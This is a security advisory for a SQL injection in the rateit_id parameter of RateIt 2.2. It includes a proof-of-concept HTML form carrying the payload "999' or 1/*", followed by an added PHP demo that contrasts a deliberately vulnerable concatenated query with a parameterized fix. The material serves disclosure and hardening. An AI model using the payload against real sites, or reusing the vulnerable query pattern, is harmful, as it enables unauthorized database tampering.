SQL Injection Vulnerability in RateIt
Summary
- Vulnerability: SQL Injection Vulnerability in RateIt
- Discovered: 2006.04.14
- Last Update: 2006.04.24 Exploitation code published
- ID: EV0124
- CVE: CVE-2006-1798
- Risk Level: medium
- Type: SQL Injection
- Status: Unpatched. No reply from developer(s)
- Vendor: n/a
- Vulnerable Software: RateIt (http://www.absoft-my.com/)
- Version: 2.2
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
A SQL injection vulnerability was found in the RateIt (http://www.absoft-my.com/) script.
Vulnerable script: rateit.php
The $rateit_id parameter is not properly sanitized before being used in an SQL query. This allows arbitrary SQL code to be injected, so the query that is executed can be changed into any SQL query.
Condition: magic_quotes_gpc = off
PoC/Exploit
SQL Injection Example:
<form action="http://[host]/rate/index.php" method="post">
<input name="rate" value="x">
<input name="rateit_id" value="999' or 1/*">
<input name="hotscript_id" value="12345">
<input name="postedcounter" value="1">
<input name="action" value="doit">
<input type="submit" value="Rate!">
</form>
Solution
A solution for "SQL Injection Vulnerability in RateIt" is not available. Check the vendor's website for updates.
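A hardening pattern for this class of bug, as an added example that is neither RateIt's code nor a vendor fix: the table, column names, query shape and the in-memory SQLite database are assumptions chosen so the script runs stand-alone. It passes the rateit_id value from the PoC form above to a concatenated query and to a validated, parameterized one; the latter does not depend on the magic_quotes_gpc setting.

```php
<?php
// Added illustration: the table, columns and query shape are hypothetical,
// not taken from rateit.php. Requires the pdo_sqlite extension.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE ratings (id INTEGER PRIMARY KEY, votes INTEGER)');
$pdo->exec('INSERT INTO ratings VALUES (1, 0), (2, 0), (3, 0)');

// Vulnerable pattern: the request value is pasted into the statement text,
// so a quote in the value ends the string literal and the rest is parsed as SQL.
function rate_unsafe(PDO $pdo, string $rateitId): int
{
    $sql = "UPDATE ratings SET votes = votes + 1 WHERE id = '$rateitId'";
    return $pdo->exec($sql);            // number of rows changed
}

// Hardened pattern: strict integer validation, then a bound parameter.
function rate_safe(PDO $pdo, string $rateitId): int
{
    $id = filter_var($rateitId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 0;                       // reject anything that is not a positive integer
    }
    $stmt = $pdo->prepare('UPDATE ratings SET votes = votes + 1 WHERE id = :id');
    $stmt->execute([':id' => $id]);     // value travels separately from the SQL text
    return $stmt->rowCount();
}

$payload = "999' or 1/*";               // rateit_id value from the PoC form on this page

printf("unsafe, PoC value: %d row(s) changed\n", rate_unsafe($pdo, $payload));
printf("safe, PoC value:   %d row(s) changed\n", rate_safe($pdo, $payload));
printf("safe, id=2:        %d row(s) changed\n", rate_safe($pdo, '2'));
```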